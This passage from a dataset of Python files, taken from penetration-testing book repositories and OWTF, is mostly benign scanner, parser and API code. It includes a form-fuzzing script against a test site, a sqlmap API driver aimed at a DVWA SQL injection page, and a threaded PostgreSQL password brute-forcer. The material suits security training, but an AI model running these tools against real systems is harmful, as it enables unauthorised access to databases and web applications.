return True\n else:\n return False\n except Exception as e:\n print(target_id, e)\n return False\n\n def reports(self, id_list, list_type, task_name):\n # list_type = \"scans\", 'targets' ...\n data = {\n \"template_id\": \"11111111-1111-1111-1111-111111111111\",\n \"source\": {\n \"list_type\": list_type,\n \"id_list\": id_list\n }\n }\n try:\n response = requests.post(self.scanner_url + \"/api/v1/reports\", headers=self.headers,\n data=json.dumps(data), timeout=30, verify=False)\n if response.status_code == 201:\n while True:\n res_down = requests.get(self.scanner_url + response.headers['Location'],\n headers=self.headers, timeout=30, verify=False)\n if json.loads(res_down.content)['status'] == \"completed\":\n for report_url in json.loads(res_down.content)['download']:\n report_res = requests.get(self.scanner_url + report_url, timeout=30, verify=False)\n report_name = time.strftime(\"%y%m%d\", time.localtime()) + \"_\" + task_name[0] + '.' + report_url.split('.')[-1]\n if os.path.exists(self.awvs_report_path + report_name):\n os.remove(self.awvs_report_path + report_name)\n with open(self.awvs_report_path + report_name, \"wb\") as report_content:\n report_content.write(report_res.content)\n self.report_url.append(report_name)\n return self.report_url\n else:\n return False\n except Exception as e:\n print(id_list, e)\n return False\n"},"avg_line_length":{"kind":"number","value":40.83552631578947,"string":"40.835526"},"max_line_length":{"kind":"number","value":138,"string":"138"},"alphnanum_fraction":{"kind":"number","value":0.5169864737338786,"string":"0.516986"}}},{"rowIdx":147,"cells":{"repo_name":{"kind":"string","value":"Effective-Python-Penetration-Testing"},"text":{"kind":"string","value":"import mechanize\n\nurl = \"http://www.webscantest.com/datastore/search_by_id.php\"\nbrowser = mechanize.Browser()\nattackNumber = 1\nwith open('attack-vector.txt') as f:\n for line in f:\n \tbrowser.open(url)\n\tbrowser.select_form(nr=0)\n \tbrowser[\"id\"] = line\n \tres = browser.submit()\n\tcontent = res.read()\n\toutput = open('response/'+str(attackNumber)+'.txt', 'w')\n\toutput.write(content)\n\toutput.close()\n\tprint attackNumber\n\tattackNumber += 1\n\t\n"},"avg_line_length":{"kind":"number","value":22.57894736842105,"string":"22.578947"},"max_line_length":{"kind":"number","value":61,"string":"61"},"alphnanum_fraction":{"kind":"number","value":0.6845637583892618,"string":"0.684564"}}},{"rowIdx":148,"cells":{"repo_name":{"kind":"string","value":"Effective-Python-Penetration-Testing"},"text":{"kind":"string","value":"from bs4 import BeautifulSoup\nimport re\n\nparse = BeautifulSoup('Title of the page

This is a paragraphoneExample Link 1

This is a paragraphtwoExample Link 2

')\n\nprint parse.prettify()\n\n\n \n \n Title of the page\n \n \n \n

\n This is a paragraph\n \n one\n \n \n Example Link 1\n \n

\n

\n This is a paragraph\n \n two\n \n \n Example Link 2\n \n

\n \n\n\n"},"avg_line_length":{"kind":"number","value":19.52777777777778,"string":"19.527778"},"max_line_length":{"kind":"number","value":302,"string":"302"},"alphnanum_fraction":{"kind":"number","value":0.5962059620596206,"string":"0.596206"}}},{"rowIdx":149,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"import time, dpkt\r\nimport plotly.plotly as py\r\nfrom plotly.graph_objs import *\r\nfrom datetime import datetime\r\n\r\nfilename = 'hbot.pcap'\r\n\r\nfull_datetime_list = []\r\ndates = []\r\n\r\nfor ts, pkt in dpkt.pcap.Reader(open(filename,'rb')):\r\n eth=dpkt.ethernet.Ethernet(pkt) \r\n if eth.type!=dpkt.ethernet.ETH_TYPE_IP:\r\n continue\r\n\r\n ip = eth.data\r\n tcp=ip.data\r\n \r\n if ip.p not in (dpkt.ip.IP_PROTO_TCP, dpkt.ip.IP_PROTO_UDP):\r\n continue\r\n\r\n if tcp.dport == 21 or tcp.sport == 21:\r\n full_datetime_list.append((ts, str(time.ctime(ts))))\r\n \r\n\r\nfor t,d in full_datetime_list:\r\n if d not in dates:\r\n dates.append(d)\r\n \r\ndates.sort(key=lambda date: datetime.strptime(date, \"%a %b %d %H:%M:%S %Y\"))\r\n\r\ndatecount = []\r\n\r\nfor d in dates:\r\n counter = 0\r\n for d1 in full_datetime_list:\r\n if d1[1] == d:\r\n counter += 1\r\n\r\n datecount.append(counter)\r\n\r\n\r\ndata = Data([\r\n Scatter(\r\n x=dates,\r\n y=datecount\r\n )\r\n])\r\nplot_url = py.plot(data, filename='FTP Requests')\r\n"},"avg_line_length":{"kind":"number","value":19.94,"string":"19.94"},"max_line_length":{"kind":"number","value":77,"string":"77"},"alphnanum_fraction":{"kind":"number","value":0.5803059273422562,"string":"0.580306"}}},{"rowIdx":150,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"import shelve\ndef create():\n\tshelf = shelve.open(\"mohit.raj\", writeback=True)\n\tshelf['desc'] ={}\n\tshelf.close()\n\tprint \"Dictionary is created\"\n\n\ndef update():\n shelf = shelve.open(\"mohit.raj\", writeback=True)\n data=(shelf['desc'])\n port =int(raw_input(\"Enter the Port: \"))\n data[port]= raw_input(\"\\n Enter the description\\t\")\n shelf.close()\n \ndef del1():\n shelf = shelve.open(\"mohit.raj\", writeback=True)\n data=(shelf['desc'])\n port =int(raw_input(\"Enter the Port: \"))\n del data[port]\n shelf.close()\n print \"\\nEntry is deleted\"\n \n\ndef list1():\n print \"*\"*30\n shelf = shelve.open(\"mohit.raj\", writeback=True)\n data=(shelf['desc'])\n for key, value in data.items():\n print key, \":\", value\n print \"*\"*30\nprint \"\\t Program to update or Add and Delete the port number detail\\n\"\nwhile(True):\n\tprint \"Press\" \n\tprint \"C for create only one time create\"\n\tprint \"U for Update or Add \\nD for delete\"\n\tprint \"L for list the all values \"\n\tprint \"E for Exit \"\n\tc=raw_input(\"Enter : \") \n\n\tif (c=='C' or c=='c'):\n\t\tcreate()\n\n\telif (c=='U' or c=='u'):\n\t\tupdate()\n\n\telif(c=='D' or c=='d'):\n\t\tdel1()\n\n\telif(c=='L' or c=='l'):\n\t\tlist1()\n\t\t\n\telif(c=='E' or c=='e'):\n\t\texit()\n\n\telse:\n\t\tprint \"\\t Wrong Input\"\n\n\n\n\n"},"avg_line_length":{"kind":"number","value":19.274193548387096,"string":"19.274194"},"max_line_length":{"kind":"number","value":71,"string":"71"},"alphnanum_fraction":{"kind":"number","value":0.5923566878980892,"string":"0.592357"}}},{"rowIdx":151,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\nACTIVE Plugin for Unauthenticated Nikto testing\nThis will perform a \"low-hanging-fruit\" pass on the web app for easy to find (tool-findable) vulns\n\"\"\"\nfrom owtf.managers.resource import get_resources\nfrom owtf.plugin.helper import plugin_helper\n\nDESCRIPTION = \"Active Vulnerability Scanning without credentials via nikto\"\n\n\ndef run(PluginInfo):\n NiktoOutput = plugin_helper.CommandDump(\n \"Test Command\", \"Output\", get_resources(\"Nikto_Unauth\"), PluginInfo, []\n )\n Content = plugin_helper.CommandDump(\n \"Test Command\",\n \"Output\",\n get_resources(\"Nikto_Verify_Unauth\"),\n PluginInfo,\n NiktoOutput,\n )\n return Content + NiktoOutput # Show Nikto Verify FIRST (more useful, with links to findings, etc)\n"},"avg_line_length":{"kind":"number","value":32.04347826086956,"string":"32.043478"},"max_line_length":{"kind":"number","value":102,"string":"102"},"alphnanum_fraction":{"kind":"number","value":0.7048748353096179,"string":"0.704875"}}},{"rowIdx":152,"cells":{"repo_name":{"kind":"string","value":"Hands-On-Penetration-Testing-with-Python"},"text":{"kind":"string","value":"import requests\nimport json\nimport time\nimport pprint\n\nclass SqliAutomate():\n\n def __init__(self,url,other_params={}):\n self.url=url\n self.other=other_params \n \n def start_polling(self,task_id):\n try:\n time.sleep(30)\n poll_resp=requests.get(\"http://127.0.0.1:8775/scan/\"+task_id+\"/log\")\n pp = pprint.PrettyPrinter(indent=4)\n #print(poll_resp.json())\n pp.pprint(poll_resp.json())\n except Exception as ex:\n print(\"Exception caught : \" +str(ex))\n\n def start(self):\n try: \n task_resp=requests.get(\"http://127.0.0.1:8775/task/new\")\n data=task_resp.json()\n if data.get(\"success\",\"\") ==True:\n task_id=data.get(\"taskid\")\n print(\"Task id : \"+str(task_id))\n data_={'url':self.url}\n data_.update(self.other)\n opt_resp=requests.post(\"http://127.0.0.1:8775/option/\"+task_id+\"/set\",json=data_)\n if opt_resp.json().get(\"success\")==True:\n start_resp=requests.post(\"http://127.0.0.1:8775/scan/\"+task_id+\"/start\",json=data_)\n if start_resp.json().get(\"success\")==True:\n print(\"Scan Started successfully .Now polling\\n\")\n self.start_polling(task_id)\n except Exception as ex:\n print(\"Exception : \"+str(ex))\n\nother={'cookie':'PHPSESSID=7brq7o2qf68hk94tan3f14atg4;security=low'}\nobj=SqliAutomate('http://192.168.250.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit',other)\nobj.start()\n"},"avg_line_length":{"kind":"number","value":36.44186046511628,"string":"36.44186"},"max_line_length":{"kind":"number","value":103,"string":"103"},"alphnanum_fraction":{"kind":"number","value":0.5475450590428838,"string":"0.547545"}}},{"rowIdx":153,"cells":{"repo_name":{"kind":"string","value":"PenetrationTestingScripts"},"text":{"kind":"string","value":"#coding=utf-8\nimport time\nimport threading\nfrom printers import printPink,printGreen\nfrom multiprocessing.dummy import Pool\nimport psycopg2\nimport re\n\n\ndef postgres_connect(ip,username,password,port):\n crack =0\n try:\n db=psycopg2.connect(user=username, password=password, host=ip, port=port)\n if db:\n crack=1\n db.close()\n except Exception, e:\n if re.findall(\".*Password.*\",e[0]):\n lock.acquire()\n print \"%s postgres's %s:%s login fail\" %(ip,username,password)\n lock.release()\n crack=2\n else:\n lock.acquire()\n print \"connect %s postgres service at %s login fail \" %(ip,port)\n lock.release()\n crack=3\n pass\n return crack\n\ndef postgreS(ip,port):\n try:\n d=open('conf/postgres.conf','r')\n data=d.readline().strip('\\r\\n')\n while(data):\n username=data.split(':')[0]\n password=data.split(':')[1]\n flag=postgres_connect(ip,username,password,port)\n time.sleep(0.1)\n if flag==3:\n break\n\n if flag==1:\n lock.acquire()\n printGreen(\"%s postgres at %s has weaken password!!-------%s:%s\\r\\n\" %(ip,port,username,password))\n result.append(\"%s postgres at %s has weaken password!!-------%s:%s\\r\\n\" %(ip,port,username,password))\n lock.release()\n break\n data=d.readline().strip('\\r\\n')\n except Exception,e:\n print e\n pass\n\ndef postgres_main(ipdict,threads):\n printPink(\"crack postgres now...\")\n print \"[*] start postgres %s\" % time.ctime()\n starttime=time.time()\n\n global lock\n lock = threading.Lock()\n global result\n result=[]\n\n pool=Pool(threads)\n\n for ip in ipdict['postgres']:\n pool.apply_async(func=postgreS,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))\n\n pool.close()\n pool.join()\n print \"[*] stop crack postgres %s\" % time.ctime()\n print \"[*] crack postgres done,it has Elapsed time:%s \" % (time.time()-starttime)\n return result"},"avg_line_length":{"kind":"number","value":29.356164383561644,"string":"29.356164"},"max_line_length":{"kind":"number","value":121,"string":"121"},"alphnanum_fraction":{"kind":"number","value":0.5367945823927766,"string":"0.536795"}}},{"rowIdx":154,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\ntests.suite.categories\n~~~~~~~~~~~~~~~~~~~~~~\n\nTest categories.\n\"\"\"\nfrom tests.functional.cli.test_empty_run import OWTFCliEmptyRunTest\nfrom tests.functional.cli.test_list_plugins import OWTFCliListPluginsTest\nfrom tests.functional.cli.test_nowebui import OWTFCliNoWebUITest\nfrom tests.functional.cli.test_scope import OWTFCliScopeTest\nfrom tests.functional.cli.test_except import OWTFCliExceptTest\nfrom tests.functional.cli.test_only import OWTFCliOnlyPluginsTest\nfrom tests.functional.plugins.web.test_web import OWTFCliWebPluginTest\nfrom tests.functional.plugins.web.active.test_web_active import OWTFCliWebActivePluginTest\n\nSUITES = [\n OWTFCliEmptyRunTest,\n OWTFCliListPluginsTest,\n OWTFCliNoWebUITest,\n OWTFCliScopeTest,\n OWTFCliExceptTest,\n OWTFCliOnlyPluginsTest,\n OWTFCliWebPluginTest,\n OWTFCliWebActivePluginTest,\n]\n"},"avg_line_length":{"kind":"number","value":31.846153846153847,"string":"31.846154"},"max_line_length":{"kind":"number","value":90,"string":"90"},"alphnanum_fraction":{"kind":"number","value":0.8077373974208675,"string":"0.807737"}}},{"rowIdx":155,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\ntests.utils\n~~~~~~~~~~~\n\nMiscellaneous functions for test cases\n\"\"\"\nimport os\nimport shutil\nimport subprocess\n\nDIR_OWTF_REVIEW = \"owtf_review\"\nDIR_OWTF_LOGS = \"logs\"\n\n\ndef db_setup(cmd):\n \"\"\"Reset OWTF database.\"\"\"\n if cmd not in [\"clean\", \"init\"]:\n return\n formatted_cmd = \"make db-{}\".format(cmd)\n pwd = os.getcwd()\n db_process = subprocess.Popen(\n \"/usr/bin/echo '\\n' | %s %s\" % (os.path.join(pwd), formatted_cmd),\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n db_process.wait()\n\n\ndef clean_owtf_review():\n \"\"\"Remove OWTF owtf_review output directory.\"\"\"\n pwd = os.getcwd()\n shutil.rmtree(os.path.join(pwd, DIR_OWTF_REVIEW), ignore_errors=True)\n\n\ndef load_log(\n name,\n dir_owtf_review=DIR_OWTF_REVIEW,\n dir_owtf_logs=DIR_OWTF_LOGS,\n absolute_path=False,\n):\n \"\"\"Read the file 'name' and returns its content.\"\"\"\n if not name.endswith(\".log\"):\n name += \".log\"\n if not absolute_path:\n fullpath = os.path.join(os.getcwd(),\n \tdir_owtf_review,\n \tdir_owtf_logs,\n \tname\n )\n else:\n fullpath = name\n with open(fullpath, \"r\") as f:\n return f.readlines()\n"},"avg_line_length":{"kind":"number","value":21.163636363636364,"string":"21.163636"},"max_line_length":{"kind":"number","value":74,"string":"74"},"alphnanum_fraction":{"kind":"number","value":0.5886699507389163,"string":"0.58867"}}},{"rowIdx":156,"cells":{"repo_name":{"kind":"string","value":"Hands-On-Penetration-Testing-with-Python"},"text":{"kind":"string","value":"#!/usr/bin/python3.5\nclass ASP_Parent():\n\tdef __init__(self,pub,prot,priv):\n\t\tself.public=pub\n\t\tself._protected=prot\n\t\tself.__private=priv\nclass ASP_child(ASP_Parent):\n\tdef __init(self,pub,prot,priv):\n\t\tsuper().__init__(pub,prot,priv)\n\tdef printMembers(self):\n\t\ttry:\n\t\t\tprint(\"Public is :\" + str(self.public))\n\t\t\tprint(\"Protected is : \" + str(self._protected))\n\t\t\tprint(\"Private is : \" + str(self.__private))\n\t\texcept Exception as ex:\n\t\t\tprint(\"Ex: \" +str(ex))\n\t\t\t#pr=ASP_Parent()\n\t\t\tprint(\"Private is : \" +str(self._ASP_Parent__private))\n\nch=ASP_child(1,2,3)\nch.printMembers()\nprint(\"Public outside :\"+str(ch.public))\nprint(\"Protceted outside :\"+str(ch._protected))\t\t\t\nprint(\"Private outside :\"+str(ch._ASP_Parent__private))\t\t\n\n\n\n\n"},"avg_line_length":{"kind":"number","value":24.275862068965516,"string":"24.275862"},"max_line_length":{"kind":"number","value":57,"string":"57"},"alphnanum_fraction":{"kind":"number","value":0.6516393442622951,"string":"0.651639"}}},{"rowIdx":157,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"#!/usr/bin/env python\n\nimport ctypes\nimport os\nfrom os.path import join\nimport sys\n\n# load shared library\nlibcap2 = ctypes.cdll.LoadLibrary('libcap.so.2')\n\nclass cap2_smart_char_p(ctypes.c_char_p):\n \"\"\"Implements a smart pointer to a string allocated\n by libcap2.so.2\"\"\"\n def __del__(self):\n libcap2.cap_free(self)\n\n# note to ctypes: cap_to_text() returns a pointer\n# that needs automatic deallocation\nlibcap2.cap_to_text.restype = cap2_smart_char_p\n\ndef caps_from_file(filename):\n \"\"\"Returns the capabilities of the given file as text\"\"\"\n\n cap_t = libcap2.cap_get_file(filename)\n if cap_t == 0:\n return ''\n return libcap2.cap_to_text(cap_t, None).value\n\n\ndef get_caps_list(basepath):\n \"\"\"Collects file capabilities of a directory tree.\n\n Arguments:\n basepath -- directory to start from\"\"\"\n\n result = {}\n for root, dirs, files in os.walk(basepath):\n for f in files:\n fullname = join(root, f)\n caps = caps_from_file(fullname)\n if caps != '':\n result[fullname] = caps\n\n return result\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print 'Usage %s root_directory' % sys.argv[0]\n sys.exit(1)\n\n capabilities = get_caps_list(sys.argv[1])\n\n for filename, caps in capabilities.iteritems():\n print \"%s: %s\" % (filename, caps)\n"},"avg_line_length":{"kind":"number","value":23.8,"string":"23.8"},"max_line_length":{"kind":"number","value":60,"string":"60"},"alphnanum_fraction":{"kind":"number","value":0.6243580337490829,"string":"0.624358"}}},{"rowIdx":158,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"# Importing required modules\nimport requests \nfrom bs4 import BeautifulSoup \nimport urlparse\n\nresponse = requests.get('http://www.freeimages.co.uk/galleries/food/breakfast/index.htm') \nparse = BeautifulSoup(response.text)\n\n# Get all image tags\nimage_tags = parse.find_all('img')\n\n# Get urls to the images\nimages = [ url.get('src') for url in image_tags]\n\n# If no images found in the page\nif not images: \n sys.exit(\"Found No Images\")\n\n# Convert relative urls to absolute urls if any\nimages = [urlparse.urljoin(response.url, url) for url in images] \nprint 'Found %s images' % len(images)\n\n\n# Download images to downloaded folder\nfor url in images: \n r = requests.get(url)\n f = open('downloaded/%s' % url.split('/')[-1], 'w')\n f.write(r.content)\n f.close()\n print 'Downloaded %s' % url\n\n"},"avg_line_length":{"kind":"number","value":24.28125,"string":"24.28125"},"max_line_length":{"kind":"number","value":91,"string":"91"},"alphnanum_fraction":{"kind":"number","value":0.6943069306930693,"string":"0.694307"}}},{"rowIdx":159,"cells":{"repo_name":{"kind":"string","value":"Hands-On-Penetration-Testing-with-Python"},"text":{"kind":"string","value":"#! /usr/bin/python3.5\nimport xml.etree.ElementTree as ET\nimport sys\nclass XML_parser():\n\tdef __init__(self,xml):\n\t\tself.xml=xml\n\t\t\n\tdef parse(self,parse_type=\"doc\"):\n\t\t#root=ET.fromstring(country_data_as_string)\n\t\tif parse_type ==\"doc\":\n\t\t\troot = ET.parse(self.xml).getroot()\n\t\telse:\n\t\t\troot=ET.fromstring(self.xml)\n\t\ttag = root.tag\n\t\tprint(\"Root tag is :\"+str(tag))\n\t\tattributes = root.attrib\n\t\tprint(\"Root attributes are :\")\n\t\tfor k,v in attributes.items():\n\t\t\tprint(\"\\t\"+str(k) +\" : \"+str(v))\n\t\tprint(\"\\nPrinting Node Details without knowing subtags :\")\n\t\tfor employee in root: #.findall(tag)\n\t\t\t# access all elements in node\n\t\t\tprint(\"\\n-----------------------------\")\n\t\t\tfor element in employee:\n\t\t\t\tele_name = element.tag\n\t\t\t\tele_value = employee.find(element.tag).text\n\t\t\t\tprint(\"\\t\\t\"+ele_name, ' : ', ele_value)\n\n\t\tprint(\"\\n\\nPrinting Node Details specifying subtags :\")\n\t\tfor employee in root.findall(\"employee\"):\n\t\t\tprint(\"\\n-----------------------------\")\n\t\t\tprint(\"\\t\\tName :\" +str(employee.find(\"name\").text))\n\t\t\tprint(\"\\t\\tSalary :\" +str(employee.find(\"salary\").text))\n\t\t\tprint(\"\\t\\tAge :\" +str(employee.find(\"age\").text))\n\t\t\tprint(\"\\t\\tManager Id :\" +str(employee.find(\"manager_id\").text))\n\t\t\tprint(\"\\t\\tDOJ :\" +str(employee.find(\"doj\").text))\t\t\nobj=XML_parser(sys.argv[1])\nobj.parse()\n\nxml=\"\"\"\n \n Emp1\n\t32\n\t30000\n\t06/06/2016\n\t33\n \n \n Emp2\n\t28\n\t27000\n\t18/02/2017\n\t33\n \n\"\"\"\n#obj=XML_parser(xml)\n#obj.parse(\"string\")\n\n"},"avg_line_length":{"kind":"number","value":28.271186440677965,"string":"28.271186"},"max_line_length":{"kind":"number","value":67,"string":"67"},"alphnanum_fraction":{"kind":"number","value":0.6152954808806489,"string":"0.615295"}}},{"rowIdx":160,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\nowtf.api.handlers.plugin\n~~~~~~~~~~~~~~~~~~~~~~~~\n\n\"\"\"\nimport collections\n\nfrom owtf.api.handlers.base import APIRequestHandler\nfrom owtf.constants import MAPPINGS\nfrom owtf.lib import exceptions\nfrom owtf.lib.exceptions import APIError\nfrom owtf.managers.plugin import get_all_plugin_dicts, get_types_for_plugin_group\nfrom owtf.managers.poutput import delete_all_poutput, get_all_poutputs, update_poutput\nfrom owtf.models.test_group import TestGroup\nfrom owtf.api.handlers.jwtauth import jwtauth\n\n__all__ = [\"PluginNameOutput\", \"PluginDataHandler\", \"PluginOutputHandler\"]\n\n\n@jwtauth\nclass PluginDataHandler(APIRequestHandler):\n \"\"\"Get completed plugin output data from the DB.\"\"\"\n\n SUPPORTED_METHODS = [\"GET\"]\n\n # TODO: Creation of user plugins\n def get(self, plugin_group=None, plugin_type=None, plugin_code=None):\n \"\"\"Get plugin data based on user filter data.\n\n **Example request**:\n\n .. sourcecode:: http\n\n GET /api/v1/plugins/?group=web&group=network HTTP/1.1\n Accept: application/json, text/javascript, */*\n X-Requested-With: XMLHttpRequest\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Encoding: gzip\n Vary: Accept-Encoding\n Content-Type: application/json\n\n {\n \"status\": \"success\",\n \"data\": [\n {\n \"file\": \"Old_Backup_and_Unreferenced_Files@OWTF-CM-006.py\",\n \"code\": \"OWTF-CM-006\",\n \"group\": \"web\",\n \"attr\": null,\n \"title\": \"Old Backup And Unreferenced Files\",\n \"key\": \"external@OWTF-CM-006\",\n \"descrip\": \"Plugin to assist manual testing\",\n \"min_time\": null,\n \"type\": \"external\",\n \"name\": \"Old_Backup_and_Unreferenced_Files\"\n },\n {\n \"file\": \"Old_Backup_and_Unreferenced_Files@OWTF-CM-006.py\",\n \"code\": \"OWTF-CM-006\",\n \"group\": \"web\",\n \"attr\": null,\n \"title\": \"Old Backup And Unreferenced Files\",\n \"key\": \"passive@OWTF-CM-006\",\n \"descrip\": \"Google Hacking for juicy files\",\n \"min_time\": null,\n \"type\": \"passive\",\n \"name\": \"Old_Backup_and_Unreferenced_Files\"\n }\n ]\n }\n \"\"\"\n try:\n filter_data = dict(self.request.arguments)\n if not plugin_group: # Check if plugin_group is present in url\n self.success(get_all_plugin_dicts(self.session, filter_data))\n if plugin_group and (not plugin_type) and (not plugin_code):\n filter_data.update({\"group\": plugin_group})\n self.success(get_all_plugin_dicts(self.session, filter_data))\n if plugin_group and plugin_type and (not plugin_code):\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in selected plugin group\")\n filter_data.update({\"type\": plugin_type, \"group\": plugin_group})\n self.success(get_all_plugin_dicts(self.session, filter_data))\n if plugin_group and plugin_type and plugin_code:\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in selected plugin group\")\n filter_data.update({\"type\": plugin_type, \"group\": plugin_group, \"code\": plugin_code})\n # This combination will be unique, so have to return a dict\n results = get_all_plugin_dicts(self.session, filter_data)\n if results:\n self.success(results[0])\n else:\n raise APIError(500, \"Cannot get any plugin dict\")\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target provided.\")\n\n\n@jwtauth\nclass PluginNameOutput(APIRequestHandler):\n \"\"\"Get the scan results for a target.\"\"\"\n\n SUPPORTED_METHODS = [\"GET\"]\n\n def get(self, target_id=None):\n \"\"\"Retrieve scan results for a target.\n\n **Example request**:\n\n .. sourcecode:: http\n\n GET /api/v1/targets/2/poutput/names/ HTTP/1.1\n Accept: */*\n Accept-Encoding: gzip, deflate\n X-Requested-With: XMLHttpRequest\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Encoding: gzip\n Content-Type: application/json; charset=UTF-8\n\n {\n \"status\": \"success\",\n \"data\": {\n \"OWTF-AT-004\": {\n \"data\": [\n {\n \"status\": \"Successful\",\n \"owtf_rank\": -1,\n \"plugin_group\": \"web\",\n \"start_time\": \"01/04/2018-14:05\",\n \"target_id\": 2,\n \"run_time\": \"0s, 1ms\",\n \"user_rank\": -1,\n \"plugin_key\": \"external@OWTF-AT-004\",\n \"id\": 5,\n \"plugin_code\": \"OWTF-AT-004\",\n \"user_notes\": null,\n \"output_path\": null,\n \"end_time\": \"01/04/2018-14:05\",\n \"error\": null,\n \"plugin_type\": \"external\"\n }\n ],\n \"details\": {\n \"priority\": 99,\n \"code\": \"OWTF-AT-004\",\n \"group\": \"web\",\n \"mappings\": {\n \"OWASP_V3\": [\n \"OWASP-AT-004\",\n \"Brute Force Testing\"\n ],\n \"OWASP_V4\": [\n \"OTG-AUTHN-003\",\n \"Testing for Weak lock out mechanism\"\n ],\n \"CWE\": [\n \"CWE-16\",\n \"Configuration - Brute force\"\n ],\n \"NIST\": [\n \"IA-6\",\n \"Authenticator Feedback - Brute force\"\n ],\n \"OWASP_TOP_10\": [\n \"A5\",\n \"Security Misconfiguration - Brute force\"\n ]\n },\n \"hint\": \"Brute Force\",\n \"url\": \"https://www.owasp.org/index.php/Testing_for_Brute_Force_(OWASP-AT-004)\",\n \"descrip\": \"Testing for Brute Force\"\n }\n },\n }\n }\n \"\"\"\n try:\n filter_data = dict(self.request.arguments)\n results = get_all_poutputs(self.session, filter_data, target_id=int(target_id), inc_output=False)\n\n # Get test groups as well, for names and info links\n groups = {}\n for group in TestGroup.get_all(self.session):\n group[\"mappings\"] = MAPPINGS.get(group[\"code\"], {})\n groups[group[\"code\"]] = group\n\n dict_to_return = {}\n for item in results:\n if item[\"plugin_code\"] in dict_to_return:\n dict_to_return[item[\"plugin_code\"]][\"data\"].append(item)\n else:\n ini_list = []\n ini_list.append(item)\n dict_to_return[item[\"plugin_code\"]] = {}\n dict_to_return[item[\"plugin_code\"]][\"data\"] = ini_list\n dict_to_return[item[\"plugin_code\"]][\"details\"] = groups[item[\"plugin_code\"]]\n dict_to_return = collections.OrderedDict(sorted(dict_to_return.items()))\n if results:\n self.success(dict_to_return)\n else:\n raise APIError(500, \"Cannot fetch plugin outputs\")\n\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target provided\")\n except exceptions.InvalidParameterType:\n raise APIError(400, \"Invalid parameter type provided\")\n\n\n@jwtauth\nclass PluginOutputHandler(APIRequestHandler):\n \"\"\"Filter plugin output data.\"\"\"\n\n SUPPORTED_METHODS = [\"GET\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]\n\n def get(self, target_id=None, plugin_group=None, plugin_type=None, plugin_code=None):\n \"\"\"Get the plugin output based on query filter params.\n\n **Example request**:\n\n .. sourcecode:: http\n\n GET /api/v1/targets/2/poutput/?plugin_code=OWTF-AJ-001 HTTP/1.1\n X-Requested-With: XMLHttpRequest\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n \"status\": \"success\",\n \"data\": [\n {\n \"status\": \"Successful\",\n \"owtf_rank\": -1,\n \"plugin_group\": \"web\",\n \"start_time\": \"01/04/2018-14:06\",\n \"target_id\": 2,\n \"run_time\": \"0s, 1ms\",\n \"user_rank\": -1,\n \"plugin_key\": \"external@OWTF-AJ-001\",\n \"id\": 27,\n \"plugin_code\": \"OWTF-AJ-001\",\n \"user_notes\": null,\n \"output_path\": null,\n \"end_time\": \"01/04/2018-14:06\",\n \"error\": null,\n \"output\": \"Intended to show helpful info in the future\",\n \"plugin_type\": \"external\"\n }\n ]\n }\n \"\"\"\n try:\n filter_data = dict(self.request.arguments)\n if plugin_group and (not plugin_type):\n filter_data.update({\"plugin_group\": plugin_group})\n if plugin_type and plugin_group and (not plugin_code):\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in selected plugin group\")\n filter_data.update({\"plugin_type\": plugin_type, \"plugin_group\": plugin_group})\n if plugin_type and plugin_group and plugin_code:\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in selected plugin group\")\n filter_data.update(\n {\"plugin_type\": plugin_type, \"plugin_group\": plugin_group, \"plugin_code\": plugin_code}\n )\n results = get_all_poutputs(self.session, filter_data, target_id=int(target_id), inc_output=True)\n if results:\n self.success(results)\n else:\n raise APIError(500, \"Cannot fetch plugin outputs\")\n\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target reference provided\")\n except exceptions.InvalidParameterType:\n raise APIError(400, \"Invalid parameter type provided\")\n\n def post(self, target_url):\n raise APIError(405)\n\n def put(self):\n raise APIError(405)\n\n def patch(self, target_id=None, plugin_group=None, plugin_type=None, plugin_code=None):\n \"\"\"Modify plugin output data like ranking, severity, notes, etc.\n\n **Example request**:\n\n .. sourcecode:: http\n\n PATCH /api/v1/targets/2/poutput/web/external/OWTF-CM-008 HTTP/1.1\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n\n\n user_rank=0\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Length: 0\n Content-Type: application/json\n\n {\n \"status\": \"success\",\n \"data\": null\n }\n \"\"\"\n try:\n if (not target_id) or (not plugin_group) or (not plugin_type) or (not plugin_code):\n raise APIError(400, \"Missing requirement arguments\")\n else:\n patch_data = dict(self.request.arguments)\n update_poutput(self.session, plugin_group, plugin_type, plugin_code, patch_data, target_id=target_id)\n self.success(None)\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target reference provided\")\n except exceptions.InvalidParameterType:\n raise APIError(400, \"Invalid parameter type provided\")\n\n def delete(self, target_id=None, 